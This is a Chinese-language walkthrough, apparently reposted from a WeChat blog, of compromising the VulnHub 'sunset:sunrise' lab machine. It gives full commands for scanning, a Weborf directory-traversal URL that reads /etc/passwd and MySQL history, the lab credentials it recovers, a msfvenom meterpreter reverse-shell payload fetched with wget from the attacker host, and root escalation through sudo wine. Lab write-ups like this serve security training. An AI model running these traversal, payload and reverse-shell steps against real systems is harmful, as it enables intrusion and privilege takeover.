今天实践的是vulnhub的sunset:sunrise镜像,
用workstation导入成功,先做地址扫描,
sudo netdiscover -r 192.168.137.0/24,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.137.151,
看到8080端口有Weborf/0.12.2服务,搜到存在目录穿越漏洞,
访问密码文件,http://192.168.137.151:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd,
发现sunrise和weborf两个用户,对weborf用户进行目录文件遍历,
dirb http://192.168.137.151:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f,
访问隐藏文件,http://192.168.137.151:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/.mysql_history
得到用户名密码weborf/iheartrainbows44,
ssh登录,ssh [email protected],
sudo -l发现不能切到root,继续研究另一个用户,
通过数据库内容能够找到sunrise的用户名和密码,
mysql -u weborf -p
show databases;
use mysql;
show tables;
select * from user;
select user,password from user;
得到用户名密码,sunrise/thefutureissobrightigottawearshades,
切换账户,su sunrise,sudo -l发现wine程序是root权限的,
在kali攻击机上造一个反弹shell可执行程序,
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.137.230 LPORT=4444 -f exe -o shell.exe,
开启http下载服务,python2 -m SimpleHTTPServer,
在靶机上下载反弹shell可执行程序,cd /tmp,
wget http://192.168.137.230:8000/shell.exe,
在kali攻击机上开一个反弹shell监听,
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.137.230
set LPORT 4444
exploit
在靶机上通过wine程序执行反弹shell程序,sudo wine shell.exe,
kali攻击机上能够获取到靶机的反弹shell,确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之sunset:sunrise的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论